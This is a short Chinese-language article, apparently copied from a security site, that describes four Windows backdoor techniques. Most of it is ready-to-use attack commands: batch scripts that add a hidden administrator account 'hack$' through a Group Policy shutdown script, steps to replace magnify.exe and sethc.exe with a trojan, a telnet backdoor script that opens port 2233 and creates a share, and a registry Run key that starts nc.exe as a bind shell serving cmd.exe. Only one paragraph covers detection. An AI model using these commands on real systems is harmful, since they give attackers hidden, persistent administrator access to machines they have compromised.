原文:揭秘Windows系统的四个后门
组策略欺骗后门
创建一个批处理文件add.bat,内容是:
@echo off net user hack$ test168 /add net localgroup administrators hack$ /add exit
(2)利用
上传运行gpedit.msc,定位到“计算机配置一>Windows设置一>脚本(启动/关机)”, 双击右边窗口的“关机”,在其中添加add.bat。这样就实现了当系统关机时创建hack$用户,及时被删了,关机时又会再次创建。
还可以实现开机时添加账户,关机时删除账户等等。可以把bat转换成exe,上传到目标机器,伪装成系统程序等等。
放大镜程序后门
思路:伪造替换 magnify.exe
(1) 构造批处理脚本:magnify.bat
@echo offnet user hack$ test168 /addnet localgroup administrators hack$ /add%Windir%\system32\nagnify.exeexit
作用:先创建管理员用户,在运行原来的放大镜程序
(2)文件格式转换
利用bat2com / com2exe,BatToEXE(图形化工具)等工具把Bat文件转换成exe文件,如:
bat2com magnify.bat 将magnify.bat转换成magnify.com
com2exe magnify.com 将magnify.com转换成magnify.exe(3)利用批处理自动替换
@echo offcopy %Windir%\system32\dllcache\magnify.exe nagnify.exe 将放大镜程序备份为nagnify.execopy %Windir%\system32\magnify.exe nagnify.exe replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache 替换放大镜程序replace.exe %Windir%\magnify.exe %Windir%\system32exit
(4)使用:登陆时通过组合键 Win+U 调用
(5) 防范措施
进入%Windir%\system32\查看magnify.exe的文件图标是否是原来的放大镜的图标,如果不是的话极有可能被植入了放大镜后门。当然,有的时候攻击者也会将其文件图标更改为和原放大镜程序的图标一样。此时我们可以查看magnify.exe文件的大小和修改时间,如果这两样有一项不符就比较怀疑了。我们也可以先运行magnify.exe,然后运行查看是否有可疑的用户。
如果确定服务器被放置了放大镜后门,首先要删除该文件,然后恢复正常的放大镜程序。当然,我们也可以做得更彻底一些,用一个无关紧要的程序替换放大镜程序。甚至我们也可以以其人之道还治其人之身,构造一个magnify.exe,通过其警告攻击者或者进行入侵监控和取证。
补充:与放大镜后门类似的还有“粘滞键”后门,即按下SHIEF键五次可以启动粘滞键功能,其利用和防范措施与放大镜后门类似,只是将magnify.exe换成了sethc.exe。
telnet后门
tlntadmn config port=2233 //修改 telnet默认端口
sc config tlntsvr start= auto net start telnet
一个批处理,可以根据需要修改。转换成exe等等,思路很多。。。
@echo off sc config tlntsvr start= auto @net start telnet @tlntadmn config sec =passwd @tlntadmn config port = 2233@net user hack& 123456789 /add @net localgroup administrators hack$ /add @pause @md c:\windows\ShareFolder@net share MyShare=c:\windows\ShareFolder
msf权限维持模块:exploit/windows/local/registry_persistence
可以修改注册表,增加后门自启动代码.
reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /tREG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
相关文章:Windows、Linux后门解析
http://www.freebuf.com/articles/system/91791.html